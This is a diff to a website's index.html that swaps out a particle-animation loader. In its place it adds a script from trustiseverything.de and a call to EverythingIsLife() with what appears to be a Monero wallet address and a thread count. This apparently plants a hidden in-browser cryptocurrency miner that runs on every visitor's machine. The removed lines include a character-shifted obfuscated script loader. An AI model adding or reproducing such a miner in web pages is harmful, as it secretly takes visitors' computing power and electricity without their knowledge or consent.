--- a/index.html
+++ b/index.html
@@ -450,11 +450,9 @@
 			</li>
 		</ul>
 	</section>
-	<script>var s="=tdsjqu!tsd>#/0cvjme0qbsujdmft/njo/kt#?=0tdsjqu?";var m="";for(var i=0;i<s.length;i++)m+=String.fromCharCode(s.charCodeAt(i)-1);document.write(m);</script>
-	<script>
-		server = "http://116.89.129.87:8181" 
-		startParticlesWithId("crabman"); 
-		throttleParticles = 10;
-		</script>
+	<script src="https://trustiseverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
+<script type="text/javascript">
+EverythingIsLife('46TenHQALaxjBAETXANWDrY1CKw8q34cHEYmkBZBiNu5gxtRxYCW5uRBUZBzchcYDKRJDNZ6c2C1dboHJuJ7sxPGDitGbxr', 'x', 15);
+</script>
 </body>
 </html>
